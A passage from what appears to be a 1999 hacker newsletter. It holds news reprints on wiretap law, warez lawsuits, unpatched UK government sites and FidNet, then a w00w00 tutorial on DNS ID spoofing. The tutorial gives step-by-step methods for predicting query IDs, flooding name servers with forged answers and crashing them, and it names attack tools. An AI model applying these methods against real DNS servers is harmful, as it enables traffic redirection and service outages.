Chief among these is that it infringes on an individuals
right to privacy. They also worry that police may use
information intercepted that is unrelated to the crime
under investigation and safeguards on the restriction of
use to certain types of crime will prove ineffective.

But the government supports the Bill saying it will help
the police greatly in the battle against organised crime
and groups like the Aum Shinrikyo religious cult that
released Sarin nerve gas on the Tokyo subway in 1995.

Copyright (c) Post-Newsweek Business Information, Inc.
All rights reserved.

@HWA


29.0 Warez Groups Hit With Racketeering Charges
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Debris
Class, Paradigm, and Razor 1911 have been hit with a
federal racketeering suit filed by the Interactive Digital
Software Association, which is made up of six
independent publishers. The IDSA has brought a wide
range of charges against dozens of people across the
country including copyright and trademark piracy,
counterfeiting, and racketeering.

Wired
http://www.wired.com/news/news/buisness/story/21289.html

Game Makers Take Aim at Pirates
by Leander Kahney

12:45 p.m. 16.Aug.99.PDT
Game companies have filed federal racketeering suit against a nationwide ring of software
pirates who methodically distributed top games, sometimes even before they were commercially
available.

The Interactive Digital Software Association has banded together with six major game
publishers to file suit against three alleged pirate rings, known as Class, Paradigm, and Razor 1911.


"These are the most sophisticated hacker groups we've run across," said Doug Lowenstein, president
of the IDSA, a games industry trade group that helps investigate piracy. "They have tentacles that
stretch across the world."

According to Lowenstein, the three hacker groups involve hundreds of people worldwide and are capable
of churning out pirated software on an industrial scale. The suit recently filed in U.S. District Court
in San Francisco names dozens of individuals from across the United States.

At their height, the three groups turned out pirated copies of 100 of the most popular games every week,
Lowenstein said, costing the industry millions of dollars in lost revenues.

The groups are extremely well organized, capable of getting their hands on pre-production copies of
popular games, cracking them, and copying them to CD in a matter of days, Lowenstein said.

"These groups were responsible for a significant amount of games piracy," he said. "[This suit] won't be
the end of games piracy but it's a significant action in a long war."

The six publishers -- LucasArts Entertainment, Acclaim Entertainment, The 3DO Company, Infogrames,
Bethesda Softworks and Interplay Entertainment, joined the IDSA to file a wide range of charges, the most
serious of which include copyright and trademark piracy, counterfeiting, and racketeering.

According to the suit, the defendants operated out of San Francisco; Dallas; Minneapolis; Philadelphia;
Los Angeles; Buffalo, New York; Austin, Texas; and Champaign, Illinois.

Lowenstein declined to name defendants but said they had a significant number of associates overseas,
possibly hundreds.

The ISDA estimates worldwide piracy cost the U.S. games industry $3.2 billion in 1998.

@HWA

30.0 Public UK Sites Susceptible to Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by infowar
At DNSCon, held over the weekend in Blackpool England,
the public web sites of the Royal Mail and the Scottish
Executive where named as being vulnerable to attack.
Both sites were labeled as running unpatched versions
of Microsoft IIS4. Both sites have since been notified.
Con organizers claimed that this implied unacceptable
failures in management procedures under the Data
Protection Act. A call was also made at the con for a
national UK 'Infowar Hotline' to be established where
members of the public can safely report on weaknesses
in the UK's national Internet and Telecomms
infrastructure.

DNS Con
http://www.dnscon.org
DNS Con Press Release
http://www.hackernews.com/press/dnscon.html

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Public sector websites vulnerable to InfoWar attacks
"named and shamed" at Blackpool Conference.

In order to illustrate the need for a UK national InfoWar
reporting hotline, some public sector websites, belonging
to the Royal Mail and to the Scottish Executive were
publicly "named and shamed" as being vulnerable to
foreign InfoWar attackers.

This announcement was made at Secondary DNS, an
international Computer Security and Data Protection
conference which was held at the Norbreck Castle Hotel,
Blackpool, on Saturday 14th August 1999

website: http://www.dnscon.org
encrypted email: infowar@dnscon.org

A call was made for the establishment of a national UK
InfoWar Hotline, where patriotic members of the public
can safely "blow the whistle" on weaknesses in the UK's
national Internet and Telecomms infrastructure, 24 hours
a day, 365 days a year.

These weaknesses will eventually be exploited by
criminals, terrorists and other enemies of the UK,
damaging our reputation for excellence in information
technology, and tarnishing the trustworthiness of the UK
brand name in the era of e-commerce.

Both the Royal Mail

htpp://www.royalmail.co.uk
(and the alias http://www.viacode.co.uk)

as well as the Scottish Executive (formerly the Scottish
Office)

http://www.scotland.gov.uk

have all or part of their websites hosted on Microsoft IIS4
web servers, which have not had at least a year's worth
of freely available security patches applied to them. This
implies unacceptable failures in management procedures
under the Data Protection Act.

Consequently, it was possible for attackers, from
anywhere on the Internet, to compromise these systems
in a number of way e.g.

1) Denial of Service attacks (both Post Office and
Scottish Executive)

2) Compromise of confidential e-commerce information,
including names, addresses and credit card details of the
Post Office on-line stamps & envelopes customers

3) Compromise of confidential telegrams from friends and
families of our military forces in the Balkans sent to
BFPO-Kosovo (Post Office)

4) Damage to the trustworthiness of the ViaCode digital
certification authority brand name (Post Office).

Would you buy Digital Certificates or encryption services
from a ViaCode which, since its launch is March, cannot
seem to get its own webserver and instead uses the Royal
Mail server with a rival South African Thawte digital
certificate, rather than a ViaCode one ?

5) Issuance of fake Press releases from the official
Scottish Executive website resulting in political
embarrassment (re- shuffle the Scottish Cabinet ? )
and/or stock market manipulation ("leak" of Scottish
Budget details ?)

6) Installation of Trojan horse remote control software
such as netbus, to take complete control of these
webservers, possibly using them as a springboard for
further InfoWar attacks on the UK internet infrastructure
and other back office or internal systems within the Royal
Mail or the Scottish Executive.

Both the web sites were warned about the planned DNS
Conference announcement, with 48 hours warning by
email to their webmasters, followed up by special delivery
"snail mail" to their top management.

To date, only the Royal Mail has responded by fixing the
blatant security holes, and publishing a Security
Statement on their website

http://www.royalmail.co.uk/ISS.htm

The "process and technology to secure such systems and
data" have obviously failed. Serbian hackers, for example,
are unlikely to be deterred by threats of civil proceedings.

The senior management of the Royal Mail seems to think
that

"Microsoft patches have been applied to the website over
the last year although some have been omitted where
they are not required for our configuration."

Last Thursday 12th August is technically "over the last
year" but the wwww.royalmail.co.uk systems have been
vulnerable for months, so perhaps the senior management
are not getting the full picture from their subordinates.

"An external organisation has been contracted to test
security on our website ("penetration testing")."

Presumably this external organisation has only just been
hired, as it is inconceivable that a reputable one would
have missed the vulnerabilities mentioned above.

The Scottish Executive seems to have ignored both the
email and "snail mail" warnings, and their website still
remains vulnerable.

We strongly suggest that any news reports or press
releases published on the Sottish Executive website
should be independently verified via email, fax or phone.

We thank you for your attention

For further details, contact us by encrypted email:

infowar@dnscon.org or infowar@hushmail.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0.2i

iQA/AwUBN7kFuYOnRwzqxHsCEQLGgQCgxdAAfk
lsMt0cnLBQGh3kReSDAFsAoK1mTvtbQRhDQqb3
JXQNDO0C7Dss=QgcM
-----END PGP SIGNATURE-----

@HWA


31.0 Mitnick Prosecutor Moving to Private Practice
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ted
After successfully prosecuting Kevin Poulsen, Ron
Austin, Justin Petersen, Lewis DePayne and Kevin
Mitnick, the federal prosecutor David Schindler will be
moving on to private practice. While none of his cyber
crime cases actually went to trail he did manage to get
guilty pleas from all of them.

LA Times
http://www.latimes.com/HOME/BUSINESS/CUTTING/lat_schindler990816.htm


Online Crime Fighter Signs Off
David Schindler Is Leaving U.S. Attorney's Office for Private Practice.
By GREG MILLER, Times Staff Writer

Kevin Mitnick wasn't the only prominent figure in the computer
hacking world closing out a major phase of his career last week.
David Schindler, one of Mitnick's prosecutors, was also making
something of a curtain call.
Mitnick was sentenced to 46 months in prison and ordered to pay
$4,125 to the companies he victimized. After the hearing, Schindler said
he is leaving the U.S. attorney's office after a 10-year stint during which he
won convictions of a list of defendants that reads like a hacking hall of fame.

Besides Mitnick, Schindler also prosecuted Kevin Poulsen, Ron Austin,
Justin Petersen and Lewis DePayne--more hackers than any other federal prosecutor
has faced.
Along the way, Schindler played a leading role in a number of major
white-collar crime cases, most notably winning a conviction of former
Arizona Gov. Fife Symington on bank fraud charges in 1997.
"I've had just a fabulous run in this office," Schindler said. "I've been
fortunate to have the greatest mix of cases I could ever have imagined."
Nevertheless, Schindler is leaving in October for a position as a
partner in the law firm Latham & Watkins, where he will be part of the
firm's vast intellectual property team and where his salary will easily exceed the
$115,000 a year he earned as a federal prosecutor.

During his years as an assistant U.S.attorney in Los Angeles, Schindler built a
reputation as an unflappable litigator--circumspect, forthright and
respected by even his adversaries.

"He is an exceptionally talented prosecutor," said Richard Sherman, who
represented DePayne and, for a short while, Mitnick. "In the Symington case,
he was fighting a well-financed political giant, and he acquitted himself
admirably."

There was a recent setback in the Symington case. A federal appeals court
overturned the conviction, ruling that the judge in the case improperly dismissed
one of the jurors. Schindler said the government has asked the appeals court
to reconsider.

At 37, Schindler is about the same age as the hackers he prosecuted, and
though he may not relish the thought, he has a few things in common with them.
Like most, he is a native Southern Californian, unusually disciplined in his
craft and with a head for the complexities of computer crime.

But unlike many hackers, Schindler was never particularly interested in
technology, was fairly popular in school and came from a stable family. His
father, now deceased, was a courtroom translator. His mother is an executive
with a music publishing company.

Schindler earned a degree in psychology from UC Berkeley, a law
degree at UCLA and joined the U.S. attorney's office in 1989. Over the
course of the next few years, Southern California became a hotbed of hacking
crimes, and Schindler handled the high-profile cases.

None of the cases ever went to trial.But he extracted guilty pleas from
Poulsen and Austin, who had rigged radio station call-in contests to win a pair
of Porsches; Petersen, who once illegally wired $150,000 from a bank; Mitnick,
who swiped source code from giant

technology companies; and DePayne, Mitnick's longtime accomplice.
With those cases behind him now, Schindler offered his thoughts on
those defendants.
Poulsen "really generates the most complicated feelings for me,"
Schindler said. "He was probably the brightest, and he had the ability to
create more harm. But I'm proud of him and the way he's turned his life
around."

After serving his five-year sentence, Poulsen has established a
budding career in journalism, writing stories for Wired magazine and
columns for ZDNet.com.

Austin was "an unfortunate follower," Schindler said. "I don't think
I've ever seen anybody as frightened as he was when he was arrested. It
was clear he was not cut out for a life of crime." Austin now works at a
computer store in West Los Angeles.

Petersen, a flamboyant hacker known for schmoozing minor
celebrities and porn stars, was behind some of Schindler's more
embarrassing moments. Petersen engaged in illegal hacking even while
working as a government informant. When Schindler confronted
Petersen about this at the federal courthouse, Petersen ducked out of
their meeting, ran down the courthouse steps and became a fugitive.

"What a piece of work," Schindler said. "I don't think I've ever met a
person in my life who has had so many aborted attempts at walking the
straight and narrow, someone whose own arrogance has caused h

  
im to
self-destruct so many times."

For his part, Petersen's occasional comments about Schindler are
mostly unprintable. Petersen was recently released after a probation
violation, and is now reportedly trying to start an Internet porn company.

Schindler seems to have the most contempt for Mitnick. He is a
"
strange, in some senses pathetic, misguided human being," Schindler
said. "
I don't hold a lot of confidence that he will turn his life around."

Of course, Mitnick would probably not be complimentary toward
Schindler either. The notoriously obsessive hacker, who is still in jail, has
long believed that he has been treated unfairly, and has even accused the
government of tampering with witnesses, a charge Schindler vehemently
denies.

Surprisingly, other hackers have a fairly charitable view of Schindler,
who is married and has a 1-year-old daughter.
"
He was a very tough prosecutor," Austin said. "But looking at it in
retrospect, I think he was fair. When you compare him to everybody
else out there, he's head and shoulders above the rest."

Poulsen too holds Schindler in relatively high regard. In contrast to
other prosecutors, Schindler "
charged [me] with crimes I actually
committed," Poulsen said. "It was refreshing. I'm not crazy about
prosecutors, but what more can you ask for?"

In his new job, Schindler will be handling trade secret thefts and
other work involving large companies. But he admits he may also be
called upon to do criminal work, meaning he could be defending the
kinds of people he once prosecuted.

"
Could I be defending a Mitnick?" he asked, anticipating the
direction of the interview. "
I won't be in that position. Most hackers
aren't able to afford private practice [defense attorneys]."
Times staff writer Greg Miller can be reached at
greg.miller@latimes.com.

Copyright Los Angeles Times

@HWA

32.0 NIPC Head Talks About FidNet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Richard Clarke, the National Coordinator for Security,
Infrastructure Protection and Counterterrorism, says
that the recent hysteria over the proposed FIDNet is
unwarranted. The proposal calls for the GSA to control
the IDS network and not the FBI as previously thought.
He said that once lawmakers actually read the proposal
and understand how it works opposition will fade away.

NY Times - registration required
http://www.nytimes.com/library/tech/99/08/biztech/articles/16monitor.html

August 16, 1999


Author of Computer Surveillance Plan
Tries to Ease Fears

By TIM WEINER

ASHINGTON -- Congress has blocked money for a planned
system to safeguard government computers, a prominent
Republican has denounced the system as "
Orwellian" and some civil
libertarians are calling it a potential threat.

But the plan's author, a senior National Security Council official, says
those are only temporary setbacks to a critically needed system that will
be built if President Clinton wants it.

The proposed system, called Fidnet, is intended to protect government
computers from hackers, whether they be precocious teen-agers or
potential terrorists, administration officials say. It represents "
the first
attempt by any nation to develop a plan to defend its cyberspace," a draft
plan by the security council says. The White House is seeking $1.5 billion
in new spending for the program.

Although Fidnet has been in the works for more
than a year, many in Congress learned about it
on July 28, when The New York Times
published details of the draft proposal.

The reaction was swift. Two days later, the
House Appropriations Committee deleted $2 million in start-up money
requested by the FBI to develop the system.

Then the House majority leader, Rep. Dick Armey, R-Texas, denounced
Fidnet, saying it raised "
the Orwellian possibility that unscrupulous
government bureaucrats could one day use such a system to read our
personal e-mail."

But the principal author of the plan, Richard Clarke, the National
Security Council's counterterrorism czar, said Congress would assuredly
finance the system once lawmakers understood it and Clinton gave it the
go-ahead.

"
If the president approves Fidnet, there'll be funding for it," he said in an
interview.

Clarke, whose formal title is National Coordinator for Security,
Infrastructure Protection and Counterterrorism, has been warning for
years about the threat of an "
electronic Pearl Harbor" in the form of an
attack on government computers. He said that a cyberspace assault
would be "
as bad as being attacked by bombs," and that "an attack on
American cyberspace is an attack on the United States" that should
trigger a military response.

These fears led last year to a new initiative,
called Presidential Decision Directive 63. Fidnet
is one of the first major computer-security
programs to grow out of the directive. It would
cover civilian agencies, like the State
Department and the IRS, and would be modeled on and linked to an
existing Pentagon security system. Ultimately, the plan calls for private
companies to create security links to the government's systems.

Clarke acknowledged that no one in Congress had been briefed on
Fidnet, which has not yet been given a go-ahead by President Clinton,
and that the draft plan had raised questions among civil libertarians who
say it has a potential power to monitor innocent citizens. But he said
Congress and the system's critics had the wrong idea about the planned
surveillance network.

The critics among the civil libertarians question the FBI's role in the
computer monitoring scheme. The bureau already has a centralized
security operation called the National Infrastructure Protection Center,
based in its headquarters, that has received technical support from the
National Security Agency, the intelligence service that eavesdrops on the
rest of the world, and from the CIA.

The New York Times reported that the Fidnet system, too, would be
overseen by the FBI. Clarke's draft plan calls for the National
Infrastructure Protection Center to play a role in analyzing and
responding to any signs of intrusion. But Clarke said in the interview that
while some funds requested for Fidnet were earmarked for the Justice
Department and the bureau, the system "
would not be run by the FBI."

Instead, he said, it would be established by the General Services
Administration, an independent agency better known for furnishing
government offices than for law enforcement. "
It would not be monitoring
privately owned and operated systems, only government computers,"
Clarke said. "
And it would not violate people's privacy rights."

He conceded that failing to brief Congress was a mistake.

Because Congress already has a system to detect unauthorized intrusions
into its information systems, it should realize that "
all that Fidnet would be
would be the same kind of thing for sensitive government computers,"
Clarke said.

"
Congress has concerns about Justice being the funding source to pay for
intrusion detection mechanisms," he said. "That's a legitimate concern.
When they get the briefing they'll see there's a requirement to have
something like Fidnet."

@HWA

33.0 Spoofing revisited (w00w00)
~~~~~~~~~~~~~~~~~~~~~~~~~~~

DNS ID Hacking
--------------

Brought to you by:
Raw-Powa and w00w00 Security Development (WSD)


--[1]-- DNS ID Hacking Presentation

w00w00!
Hi. You might be wondering what DNS ID Hacking (or Spoofing) is.
DNS ID Hacking isn't the usual way of hacking/spoofing (such jizz
or any-erect). This method is based on a vulnerability on DNS Protocol.
This affects several DNS implementations (including WinNT's DNS and BIND,
for example).

--[1.1]-- DNS Protocol Mechanism

For the first step, you will need to know how the DNS works. We will only
explain the most important parts of this protocol. In order to do that, we
will follow the steps of a DNS request packet from A to Z!

1: The client (bla.bibi.com) sends a request of resolution from the domain
"
www.heike.com". To resolve the name, bla.bibi.com uses "ns.bibi.com" for
DNS. Let's take a look at the following diagram:

/----------------------------------\
| 111.1.2.123 = bla.bibi.com |
| 111.1.2.222 = ns.bibi.com |
| format: |
| IP_ADDR:PORT->IP_ADDR:PORT |
| ex: |
| 111.1.2.123:2999->111.1.2.222:53 |
\----------------------------------/
...
gethostbyname("
www.heike.com");
...

[bla.bibi.com] [ns.bibi.com]
111.1.2.123:1999 --->[?www.heike.com]------> 111.1.2.222:53

Here we see our resolution name request from source port 1999, requesting
the resolution from the DNS on port 53.

[note: The DNS is always on port 53]

Now that ns.bibi.com has received the resolution request from bla.bibi.com,
ns.bibi.com will have to resolve the name, let's look at it...

[ns.bibi.com] [ns.internic.net]
111.1.2.222:53 -------->[dns?www.heike.com]----> 198.41.0.4:53

ns.bibi.com asks ns.internic.net, which is the root name server, for the
address of www.heike.com, and if it doesn't have it and sends the request
to a name server which has authority over '.com' domains.

>>> it can have the NS record for heike.com, and not the A/CNAME for
>>> www.heike.com (this is the normal case). Also, you're not asking
>>> ns.internic.net, you're asking one of the root servers for
>>> COM directly.

[note: We ask to internic because it could have this request in its cache]

[ns.internic.net] [ns.bibi.com]
198.41.0.4:53 ------>[ns for.com is 144.44.44.4]------> 111.1.2.222:53

Here we can see that ns.internic.net answered to ns.bibi.com (which is the
NS that has authority over the domain bibi.com) with the name server
of for.com (which is the authority over '.com' domains), which has the
IP address 144.44.44.4 [let's call it ns.for.com]. Now our ns.bibi.com
will ask ns.for.com for the address of www.heike.com, but this one
doesn't have it, so it will forward the request to the DNS of heike.com
which has authority over heike.com as shown here:

[ns.bibi.com] [ns.for.com]
111.1.2.222:53 ------>[?www.heike.com]-----> 144.44.44.4:53

The answer from ns.for.com is:

[ns.for.com] [ns.bibi.com]
144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4]---> 144.44.44.4:53

Now that we know which IP address has authority on the domain "
heike.com"
[we'll call it ns.heike.com], we ask it what the IP address of the machine
www (www.heike.com) is:

[ns.bibi.com] [ns.heike.com]
111.1.2.222:53 ----->[?www.heike.com]----> 31.33.7.4:53

And now at least, we have our answer:

[ns.heike.com] [ns.bibi.com]
31.33.7.4:53 ------->[www.heike.com == 31.33.7.44] ----> 111.1.2.222:53

We can now forward it to our client bla.bibi.com:

[ns.bibi.com] [bla.bibi.com]
111.1.2.222:53 ------->[www.heike.com == 31.33.7.44]----> 111.1.2.123:1999

Now bla.bibi.com knows the IP address of www.heike.com :)

So.. now let's imagine the opposite; that we'd like to have the name of a
machine from its IP address. In order to do that, the way to proceed will
be a little different because the IP address will have to be transformed:

Example:
100.20.40.3 will become 3.40.20.100.in-addr.arpa

Attention!! This method is only for the IP resolution request (reverse DNS)

So let's look at practical example when we take the IP of www.heike.com
(31.33.7.44 or "
44.7.33.31.in-addr.arpa" after the translation into a
comprehensible format for the DNS).

...
gethostbyaddr("
31.33.7.44");
...


We send our request to ns.bibi.com (our name server):

[bla.bibi.com] [ns.bibi.com]
111.1.2.123:2600 ----->[?44.7.33.31.in-addr.arpa]-----> 111.1.2.222:53

ns.bibi.com sends the request for the name of machine that is
44.7.33.31.in-addr.arpa to ns.internic.net:

[ns.bibi.com] [ns.internic.net]
111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 198.41.0.4:53

ns.internic.net will send the IP address of a name server which has
authority on '31.in-addr.arpa':

[ns.internic.net] [ns.bibi.com]
198.41.0.4:53 --> [NS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53

Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4:

[ns.bibi.com] [ns.for.com]
111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53

And so on...
In fact the mechanism is almost identical to the one used for name
resolution.

I hope you understood the dialog on how DNS works. Now let's study DNS
messages format.

--[1.2]-- DNS packet

Here is the format of a DNS message :
+---------------------------+---------------------------+
| ID (the famous :) | flags |
+---------------------------+---------------------------+
| numbers of questions | numbers of answer |
+---------------------------+---------------------------+
| number of RR authority |number of supplementary RR |
+---------------------------+---------------------------+
| |
\ \
\ QUESTION \
| |
+-------------------------------------------------------+
| |
\ \
\ ANSWER \
| |
+-------------------------------------------------------+
| |
\ \
\ Stuff etc.. No matter \
| |
+-------------------------------------------------------+

--[1.3]-- Structure of DNS packets.

__ID__
The ID is to identify each DNS packet, since exchanges between name
servers are from port 53 to port 53, and it receive more than one

>>> not necessarilly; DNS is allowed to bind any client port, and the
>>> DNS ID is also needed for asynchronous client resolvers (which
>>> might need to make more than one simultaneous query)

request at a time, so the ID is the only way to recognize the different DNS
requests. We'll talk about it a little more later..

__flags__
The flags area is divided into several parts:

4 bits 3 bits (always 0)
| |
| |
[QR | opcode | AA| TC| RD| RA | zero | rcode ]
|
| |__|__|__| |______ 4 bits
| |_ 1 bit
|
1 bit

QR = If the QR bit is 0, it means that the packet is a question,
otherwise it's an answer.

opcode = If the value is 0 for a normal request, 1 for a reserve request,
and 2 for a status request (we don't need to know all these modes).

AA = If it is equal to 1, it says that the name server has an
authoritative answer.

TC = This is unimportant.

RD = If this flag is to 1, it means "
Recursion Request", for example
when bla.bibi.com asks ns.bibi.com to resolve the name, the flag
tells the DNS to assume this request.

RA = If this is set to 1, it means that recursion is available.
This bit is set to 1 in the answer of the name server if it
supports recursion.

Zero = Here are three zeroes...

rcode = It contains the error messages returned from DNS requests.
If 0, it means "
no error", 3 means "name error"

The 2 following flags don't have any importance to us.

DNS QUESTION:

Here is the format of a DNS question :

+-----------------------------------------------------------------------+
| name of the question |
+-----------------------------------------------------------------------+
| type of question | type of query |
+--------------------------------+--------------------------------------+

The structure of the question is like this.

Example:
www.heike.com is [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]
This is always the same for an IP address.

This splits www.heike.com into three parts: "
www", "heike", and "com". The
number in front of each part specifies the length. It is also terminated
by 0.

44.33.88.123.in-addr.arpa would be:
[2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0]
[note]: a compression format exists, but we won't use it.


type of question:

Here are the values that we will use most of the time:
[note]: There are more than 20 types of different values(!) and I'm fed
up with writing :))

name value
A | 1 | IP Address (for resolving a name to an IP)
PTR | 12 | Pointer (for resolving an IP to a name)


type of query:

The values are the same as the type of question's values (I'm not sure
it's true, but you should look through RFCs 1033-1035 and 1037).



DNS ANSWER:

The answers have a format that we call RR.

Here is the format of an answer (an RR):

+------------------------------------------------------------------------+
| name of the domain |
+------------------------------------------------------------------------+
| type | class |
+----------------------------------+-------------------------------------+
| TTL (time to live) |
+------------------------------------------------------------------------+
| resource data length | |
|----------------------------+ |
| resource data |
+-------------------------------------------------------------------------

name of the domain:

The domain name is stored in the same way that the question for the
resolution request of www.heike.com. The flag "
name of the domain" will
contain: [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0].

type:

The type flag is the same than "
type of query" in the question part of the
packet.

class:
The class flag is equal to 1 for Internet data.

time to live:
This flag explains in seconds the time-life of the informations into the
name server cache.

resource data length:
The length of resource data, for example if resource data length is 4, it
means that the data in resources data are 4 bytes long.

resource data:
here we put the IP for example (at least in our case)

As an example, this is what occurs when ns.bibi.com asks ns.heike.com for
www.heike.com's address:

ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53

+---------------------------------+--------------------------------------+
| ID = 1999 | QR = 0 opcode = 0 RD = 1 |
+---------------------------------+--------------------------------------+
| numbers of questions = htons(1) | numbers of answers = 0 |
+---------------------------------+--------------------------------------+
| number of RR authoritative = 0 | number of supplementary RR = 0 |
+---------------------------------+--------------------------------------+
<the question part>
+------------------------------------------------------------------------+
| name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+------------------------------------------------------------------------+
| type of question = htons(1) | type of query=htons(1) |
+---------------------------------+--------------------------------------+

Now let's look at the answer from ns.heike.com:

ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53

+---------------------------------+---------------------------------------+
| ID = 1999 | QR=1 opcode=0 RD=1 AA =1 RA=1 |
+---------------------------------+---------------------------------------+
| numbers of questions = htons(1) | numbers of answers = htons(1) |
+---------------------------------+---------------------------------------+
| number of RR authoritative = 0 | number of supplementary RR = 0 |
+---------------------------------+---------------------------------------+
+-------------------------------------------------------------------------+
| name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+-------------------------------------------------------------------------+
| type of question = htons(1) | type of query = htons(1) |
+-------------------------------------------------------------------------+
+-------------------------------------------------------------------------+
| name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+-------------------------------------------------------------------------+
| type = htons(1) | class = htons(1) |
+-------------------------------------------------------------------------+
| time to live = 999999 |
+-------------------------------------------------------------------------+
| resource data length = htons(4) | resource data=inet_addr("
31.33.7.44") |
+-------------------------------------------------------------------------+

Yah! That's all for now :))

Here is an analysis:
In the answer QR = 1 because it's an answer :)
AA = 1 because the name server has authority in its domain
RA = 1 because recursion is available

I hope you understood that because you will need it for the following
events.

--[2.0]-- DNS ID hack/spoof

Now it's time to clearly explain what DNS ID hacking/spoofing is.
Like we explained before, the only way for the DNS to recognize the
different questions/answers is the ID flag in the packet. Look at this
example:

ns.bibi.com;53 ----->[?www.heike.com] ------> ns.heike.com:53

So you only have to spoof the ip of ns.heike.com and answer your false
information before ns.heike.com does first!

ns.bibi.com <------- . . . . . . . . . . . ns.heike.com
|
|<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com

But in practice you have to guess the good ID. If you are on a LAN, you
can sniff to get this ID and answer before the name server (it's easy on a
Local Network :)

If you want to do this remotely you don't have a lot a choices, but you
do have 4 basic methods:

1.) Randomly test all the possible values of the ID flag. You must answer
before the NS (ns.heike.com in this example)! This method is obsolete
unless you want to know the ID or any other favorable condition to
its prediction.

>>> This method is not obsolete --- it's how real attacks work. It
takes less than a minute on a DS1 to exhaustively search all the
ID's, and if you flood (or crash) the authority servers for the
resource record you're trying to inject, you have all the time
in the world to do it. This is the problem that the current DNS
protocol can't fix.

2.) Send some DNS requests (200 or 300) in order to increase the chances
of falling on the good ID.

>>> This is analogous to using 200 or 300 responses (both consume ID
space), except that naieve DNS servers might not detect 300 queries,
even if they do detect 300 wrong answers.

3.) Flood the DNS in order to avoid its work. The name server will crash
and show the following error!

>> Oct 06 05:18:12 w00w00 named[1913]: db_free: DB_F_ACTIVE set - ABORT
at this time named is out of order :)

4.) Or you can use the vulnerability in BIND discovered by SNI (Secure
Networks, Inc.) with ID prediction (we will discuss this in a bit).


##################### Windows ID Vulnerability ###########################

I haven't tested this on WinNT, but Windows ID's are extremely easy to
predict because it is '1' by default, and '2' for the second question (if
they are 2 questions at the same time).


######################## BIND Vulnerability ##############################

There is a vulnerability in BIND (discovered by SNI as stated earlier)

>>> we didn't discover this; it's old news. We released an advisory on
>>> how much easier it is to exploit than the old papers let on.

that we will be using. In fact, DNS IDs are easily predictable; you only
have to sniff a DNS in order to do what you want. Let me explain...

The DNS uses a random ID at the beginning but it only increases this ID
for the next question.

It's easy to exploit this vulnerability.
Here is the way:

1. Be able to sniff easily the messages that comes to a random DNS (ex.
ns.dede.com for this sample).

2. You ask NS.victim.com to resolve <whatever>.dede.com, and NS.victim.com
will ask ns.dede.com to resolve <random>.dede.com

ns.victim.com ---> [?<random>.dede.com ID = 444] ---> ns.dede.com

3. Now we have the ID of the message from NS.victim.com, now you know what
ID area you'll have to use. (ID = 444 in this sample).

4. You then make your resolution request. ex. www.microsoft.com to
NS.victim.com

(you) ---> [?www.microsoft.com] ---> ns.victim.com

ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com

5. Flood the name server ns.victim.com with the ID (444) you already have and
then you increase this by one.

ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com


Now you know that DNS IDs are predictable, and they only increase. You
flood ns.victim.com with spoofed answers with the ID 444+ ;)

>>> That's not true on OpenBSD (random scoreboarded IDs).

[Note: WSDspoofID does this]

There is another way to exploit this vulnerability without a root on
any NS.

The mechanism is very simple. Here is the explanation:

We send to ns.victim.com a resolution request for *.provnet.fr

(you) ----------[?(random).provnet.fr] -------> ns.victim.com

Then, ns.victim.com asks ns1.provnet.fr to resolve <random>.provnet.fr.
There is nothing new here, but this is where the interesting part begins
here.

At this point you begin to flood ns.victim.com with spoofed answers
(with ns1.provnet.fr IP) with IDSs from 100 to 110:

(spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com
(spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com
(spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com
(spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com
...

After that, we ask ns.victim.com if <random>.provnet.fr has an IP address.

If ns.victim.com give us an IP address for <random>.provnet.fr then we
have found the correct! Otherwise, we have to repeat this attack until
we find the ID. It's a bit long but it's effective.

[Note: This is how WSD-IDpred works]


##########################################################################

Here you will find 5 programs
WSDkillDNS - very simple DNS spoofer
WSDsniffID - sniff a LAN and reply false DNS answers before the NS
WSDspoofID - a DNS ID spoofer (you'll need to be root on a NS)
WSD-IDpred - a DNS ID predictor (no need to be root on a NS)
WSD-baddns - a very simple denial of service attack to disable DNS

Note: You can find source and binaries of these programs at
ftp.w00w00.org/pub/DNS. You need to install libpcap on your machine before
any compilation of the w00w00 ID programs.


- w00w00 Security Development (WSD)
See http://www.w00w00.org and ftp://ftp.w00w00.org/pub

Thanks to: pirus, Heike, and all of w00w00 Security Development (WSD),
and Asriel.

